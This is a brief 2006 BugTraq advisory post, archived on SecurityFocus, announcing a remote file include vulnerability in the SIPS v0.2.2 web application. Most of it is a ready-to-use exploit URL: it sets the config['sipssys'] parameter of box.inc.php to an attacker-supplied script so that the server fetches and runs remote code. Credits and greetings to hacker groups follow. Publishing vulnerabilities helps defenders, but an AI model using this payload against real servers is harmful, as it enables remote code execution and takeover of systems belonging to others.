BugTraq
SIPS v 0.2.2 < = Remote File Include Vulnerability Sep 10 2006 03:02AM
the leo 008 gmail com
# SIPS v 0.2.2 < = = = = = = = = = = = = = > Remote File Include Vulnerability ;

# Discovred By : ThE__LeO ;

# Software : SIPS v 0.2.2 ;

# Exploit : http://Www.Example.Com/[Script]/sipssys/code/box.inc.php?config["sipssys
"]=[U r Evil Script] ;

# Greetz : M.I.D.T[DrackanZ, Mr.IlysS, NeThug47], Death & All Moroccan & Arab Hackers ;

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus